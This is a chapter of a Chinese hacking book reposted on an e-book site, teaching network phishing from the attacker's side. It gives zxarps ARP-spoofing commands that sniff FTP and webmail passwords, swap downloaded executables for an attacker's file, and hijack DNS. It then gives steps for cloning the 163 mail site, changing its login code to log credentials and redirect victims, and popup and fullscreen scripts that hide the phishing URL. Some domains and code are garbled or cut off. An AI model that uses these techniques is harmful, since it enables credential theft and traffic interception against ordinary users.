反黑风暴-第20章
按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
…spoofmode'1|2|3'将数据骗发到本机;欺骗对象:1为网关;2为目标机;3为两者(默认)
…speed'kb'限制指定的IP或IP段的网络总带宽;单位:KB
example(参数说明):
嗅探指定的IP段中端口80的数据,并以HEX模式写入文件
zxarps。exe…idx0…ip192。168。0。2…192。168。0。50…port80…save_hsniff。log
FTP嗅探;在21或2121端口中出现USER或PASS的数据包记录到文件
zxarps。exe…idx0…ip192。168。0。2…port21;2121…spoofmode2…logfilter〃_USER;_PASS〃…save_asniff。log
HTTPweb邮箱登陆或一些论坛登陆的嗅探;根据情况自行改关键字
zxarps。exe…idx0…ip192。168。0。2…192。168。0。50…port80…logfilter〃+POST;+user;+pass〃…save_asniff。log
用|添加嗅探条件;这样FTP和HTTP的一些敏感关键字可以一起嗅探
zxarps。exe…idx0…ip192。168。0。2…port80;21…logfilter〃+POST;+user;+pass|_USER;_PASS〃…save_asniff。log
如果嗅探到目标下载文件后缀是exe等则更改Location:为//xx。/test。exe
zxarps。exe…idx0…ip192。168。0。2…192。168。0。12;192。168。0。20…192。168。0。30…spoofmode3…postfix〃。exe;。rar;。zip〃…hackurl//xx。/…filenametest。exe
指定的IP段中的用户访问到…hacksite中的网址则只显示justforfun
zxarps。exe…idx0…ip192。168。0。2…192。168。0。99…port80…hacksite222。2。2。2;。a。;。b。…insert〃justforfun〃
指定的IP段中的用户访问的所有网站都插入一个框架代码
zxarps。exe…idx0…ip192。168。0。2…192。168。0。99…port80…insert〃〃
指定的两个IP的总带宽限制到20KB
zxarps。exe…idx0…ip192。168。0。55;192。168。0。66…speed20
DNS欺骗
zxarps。exe…idx0…ip192。168。0。55;192。168。0。66…hackdns
〃。aa。|222。22。2。2;。bb。|1。1。1。1〃
再以本机在内网中的IP地址192。168。0。10为例,在CMD命令行下运行DNS劫持的命令:
zxarps。exe–idx0–ip192。168。0。1…192。168。0。255…hackdns。hackbase。|192。168。0。10
在命令执行成功后,命令行中将显示结果。
接下来需要在本机架设一个WEB服务器,以便将内网中的DNS劫持过来。
第五章 其他网络钓鱼艺术
除了上面介绍的几种网络钓鱼技术外,还有一些钓鱼技术可以让用户更快地了解钓鱼攻击。
如利用“网站整站下载器”工具将网站的相关文件下载到本地,然后将下载的文件上传到FTP空间中,最后再对网页的内容稍加修改,即可伪造出一个与真实网站一模一样的伪冒网站。
7。5。1将163邮箱整站扒下来
攻击者为了保证钓的鱼更多、更有质量,其设定的钓鱼对象是访问量过高的站点及金融交易站点。本节将以163邮箱为例,介绍攻击者如何伪造整个网站,且让人看不出任何破绽。
为了使伪造的网站达到逼真的程度,需要将真实网站的素材下载下来,并将它们改造处理。一般会直接使用IE浏览器来将门户网站文件下载到本地,但这种做法经常会出现错误,因此,这里将介绍一个工具:网站整站下载器。
网站整站下载器可以分析网页中的所有链接(图片链接、脚本与样式表链接等),包括源码以及所有页面,并将网站的内部链接文件下载、分类,也就是说它是一个可以将整个网站下载下来的软件。
下面介绍使用“网站整站下载器”。电子书站文件的方法。
步骤01下载并安装“网站整站下载器TeleportPro…v1。61”,即可进入主窗口中。单击主窗口中工具栏上的【NewProjectwizard】(新计划项目向导)按钮,在弹出的【NewProjectwizard】(新计划项目向导)对话框中对新建的项目进行设置。
【提示】
如果是第一次运行TeleportPro软件,程序会自动出现【NewProjectwizard】(新计划项目向导)对话框,这个向导对话框中的各选项实际是TeleportPro主要功能的体现。
步骤02在对话框中保持默认设置不变,单击【下一步】按钮,即可弹出【StartingAddress】(起始地址)对话框。在地址栏中必须输入要下载的网站文件的地址,否则将被警告无法进入下一步,这里将要下载“//mail。163。”网站。
步骤03单击【下一步】按钮,在弹出的【ProjectConfiguration】(项目设置)对话框中可选择接收指定网站的文件类型,包括文本、图形和声音等,可根据要求选定,这里选择“Everything”(任何文件类型)单选按钮。对于必须持有账号和密码才能进入的网站,必须在下面的“Account”和“Password”文本框中输入正确的账号和密码,否则TeleportPro无法进入此站点下载文件。
步骤04单击【下一步】按钮,在弹出的【Congratulations】(祝贺)对话框中单击【完成】按钮,即可完成新项目向导的创建。
步骤05此时,程序会弹出【SaveAs】(另存为)对话框,在“文件名”文本框中键入后缀为。tpp的项目名,单击【保存】按钮后,即可返回TeleportPro主窗口中。
步骤06在TeleportPro主窗口中单击工具栏上的【Star】(开始)按钮,或选择【Project】→【Start】菜单项,即可开始文件下载操作。
步骤07稍等一会儿后,当“//mail。163。”网站文件下载完毕后,即可将下载的网站文件上传到FTP空间中。
再将其对比一下后,即可发现上传到空间中的虚假163邮箱网站和真实的163邮箱网站一模一样,但地址栏中的地址却不相同。
7。5。2继续完善,让伪造生效
将163邮箱网站整站下载下来后,需要将网页中的内容稍作修改,以免用户打开伪冒网站时出现破绽。
1。修改代码中的外部链接地址
由于使用网站整站下载器下载下来的网站,对于外部的链接它全部都换成了一段脚本代码:javascript:if(confirm…)。用户需要将这段脚本代码去掉,并替换成原来的链接地址。如果没有图片显示,可以手动下载到本地后再修改链接。
2.修改index。html文件中的代码
用记事本打开下载的163邮箱网站首页文件index。html,再将下面这段验证脚本删除:
varati=user。value。indexOf(〃@〃);
if(ati!=…1){
user。value=user。value。substring(0;ati);
}
varsecure=fm。remUser。checked?true:false;
varurl=fm。secure。checked?〃https://reg。163。/logins。jsp〃:〃//reg。163。/login。jsp〃;
url+=〃?type=1&url=//entry。mail。163。/coremail/fcg/ntesdoor2?〃;
url+=〃lightweight%3D1%26verifycookie%3D1%26〃;
if(secure){
user。autoplete=〃on〃;
}else{
user。autoplete=〃off〃;
}
fGetVersion(fm);
fm。action=url+〃language%3D…1%26style%3D〃+fm。style。value;
visitordata。setVals('fm。username。value;fm。style。value;fm。secure。checked?1:0';true);
visitordata。store();
再将index。html中的代码:
替换成如下代码:
脚本文件checklogin。php的功能是取得用户输入的用户名与密码信息,然后写入到db。文本文件中。代码修改完后,将文件上传到劫持PHP的空间中,并打开该空间网页,在登录信息中输入用户名和密码,即可看到返回的网页为空白网页,但其实用户输入的登录信息已经保存了。
在其中输入登录信息后,返回的空白网页会让一些用户产生怀疑,为使伪造网站更加真实,可以打开checklogin。php文件,在文件内容的最后一行“?》”前插入一行重定向到163网站的代码:header(〃Location://mail。163。〃);。
这一句代码的功能是告诉浏览器如何处理这个页面,这样,当用户访问并提交表单后,即可跳转到真实的163邮箱网站了。'Zei8。Com电子书下载:。 '
7。5。3强势的伪冒钓鱼站点
钓鱼攻击真正的目的是窃取用户的信息,从攻击者的角度来看,有效率的获取信息才是王者之道,这个“道”中就有“强势”。当一种攻击并不强势时,不会获取到期望的效果,因此,钓鱼攻击必需要强调强势。
先来了解下早期的弹出窗口实现方式。攻击者会先给用户一个链接地址,假设攻击者将这个“弹出窗口演示”的网页链接放置在一个邮件中,其中引向弹出窗口的页面为pop。html,其作用为载入钓鱼网站并弹出登录窗口,代码如下:
弹出窗口演示
if(window!=top)
{
top。location=window。location;
}
代码中的“CONTENT=0”表示在重定向到网页“//。hackbase。/”(这里假设为钓鱼站点)等待时间为0秒,且调用了弹出窗口“login。html”网页。
该网页中的代码如下:
黑客网站
用户名:
密  码:
代码中的“01300000294030122844403414774。jpg”为弹出窗口中显示的图片。单击钓鱼链接时,“pop。html”页面定向于网站“//。hackbase。/”,并调用了弹出窗口“login。html”。对于没有上网经验的用户来说,一般情况下容易被弹出窗口误导。
这种方式的弹出窗口虽然也能够误导没有上网经验的用户,但对于经常上网的用户来说,其缺陷非常明显。多数的浏览器与工具条都可以通过设置来禁止这种自动性的弹出窗口。
另外,还有一种将网址隐藏的方式就是对网页窗口全屏化,使用户无法看到网址,但这种方式同样也有缺陷,会让用户起疑心。
比较保险的做法是使用加强式script劫持函数来达到网页全屏的效果,其脚本代码如下:
全屏窗口
functionmy_function()
{
vartargeturl=〃//。hackbase。/〃
newwin=window。open(〃〃;〃〃;〃noscrollbars〃)
if(document。all)
{
newwin。moveTo(0;0)
newwin。resizeTo(screen。width。screen。height)
}
newwin。location=targeturl
}
第六章 网络钓鱼防范工具
网络钓鱼攻击从防范的角度来说可以分为两个方面,一个方面是对钓鱼攻击利用的资源进行限制,一般